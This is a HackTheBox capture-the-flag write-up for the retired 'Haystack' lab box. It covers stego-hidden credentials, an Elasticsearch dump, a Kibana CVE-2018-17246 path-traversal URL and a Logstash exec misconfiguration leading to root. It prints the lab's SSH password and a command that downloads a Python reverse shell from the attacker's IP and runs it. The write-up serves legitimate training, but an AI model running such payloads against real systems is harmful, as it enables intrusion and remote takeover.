Haystack — HackTheBox Writeup
Haystack retires this week, it was an easy difficulty box where we see some stego stuff and get initial credentials from Elastic search database. With the obtained credentials, we can SSH in and by exploiting CVE-2018–17246 in Kibana, I get shell as kibana. Kibana user has access to the LogStash config, which is misconfigured to allow code execution via a misconfigured log as root.

Enumeration and Recon
Let’s start off with a nmap scan,

We see that port 22,80,9200 are open. One thing to observe here is that the port 80 has text/html as content-type whereas port 9200 has application/json , which we can think is running some kind of API. As API’s usually return data in JSON
80 — HTTP
The website looks like this,

It has an image of needle in a haystack, that’s it. gobuster didn’t find anything interesting. Since this is a CTF challenge, I guessed that there must be something with the image, as the image was the only thing there on port 80. When I was first solving the box, I ran some basic steg tools and found nothing. One of my friends told me it’s simpler than that, and then I ran strings tool on it to find a base64 string. CTF they said, CTF it was.


Elasticsearch — 9200
It’s running version 6.4.2 elastic search. I read it’s documentation to get some overview of it.

I looked for ways to dump the database and stumbled upon https://github.com/taskrabbit/elasticsearch-dump.
Looking at the documentation, we can return the indices by
https://www.elastic.co/guide/en/elasticsearch/reference/6.4/getting-started-list-indices.html#getting-started-list-indices

We can see that we have two indices, quotes and bank . Let’s start dumping with elasticdump .

Let's analyze the dumps that we’ve got. Keep in mind the information from the quote the needle in the haystack is key .

The last words of the quotes look like a base64 string .

Found credentials.
User: security
Pass: spanish.is.key
Shell as security

Privesc to Kibana
We can safely assume that we are working on an ELK stack, which stands for
Elasticsearch, Logstash, Kibana.
Looking at the running processes, I can see that the box is running kibana and logstash as expected.
Since kibana is running internally, I port forward it with
ssh security@10.10.10.115 -L 5601:127.0.0.1:5601
We can that it’s running kibana 6.4.2 . A quick google search gets us to CVE-2018–17246.
https://github.com/mpgn/CVE-2018-17246
Shell as Kibana
Browsing to the url,
http://localhost:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../../../../../../../../../tmp/test.js

To get an understanding of the ELK stack, we can look at the picture.

“ELK” is the acronym for three open source projects: Elasticsearch, Logstash, and Kibana. Elasticsearch is a search and analytics engine. Logstash is a server‑side data processing pipeline that ingests data from multiple sources simultaneously, transforms it, and then sends it to a “stash” like Elasticsearch. Kibana lets users visualize data with charts and graphs in Elasticsearch.
In a nutshell,
E — Elasticsearch — is the search and analytics engine
L — Logstash — Processes and stores logs
K — Kibana — A visualisation tool for data in Elasticsearch.
So upto now, we have dumped Elasticsearch and got shell as Kibana user. My guess here is to look for interesting stuff in logstash.
Privesc to Root
Configuration files of logstash are present in /etc/logstash/conf.d

input.confinput {
file {
path => "/opt/kibana/logstash_*"
start_position => "beginning"
sincedb_path => "/dev/null"
stat_interval => "10 second"
type => "execute"
mode => "read"
}
}
input.conf is looking for files in /opt/kibana/ for files with name like logstash_* . This runs for every ten seconds.
filter.conffilter{
if [type] == "execute" {
grok {
match => { "message" => "Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}" }
}
}
}
If the type is execute and has the message in the formatEjecutar commando : <command>
output.confif [type] == "execute" {
stdout { codec => json }
exec {
command => "%{comando} &"
}
}
}
According to output.conf input of type execute will be run using the exec plugin.
Having gathered all the information and having the right permissions, let us place our reverse shell in /opt/kibana/logstash_test .
Contents of logstash_test :
Ejecutar comando: curl 10.10.15.236/pyshell.py -o /tmp/kk.py;python /tmp/kk.py
Haystack rooted.
Thanks for reading,
Preetham.

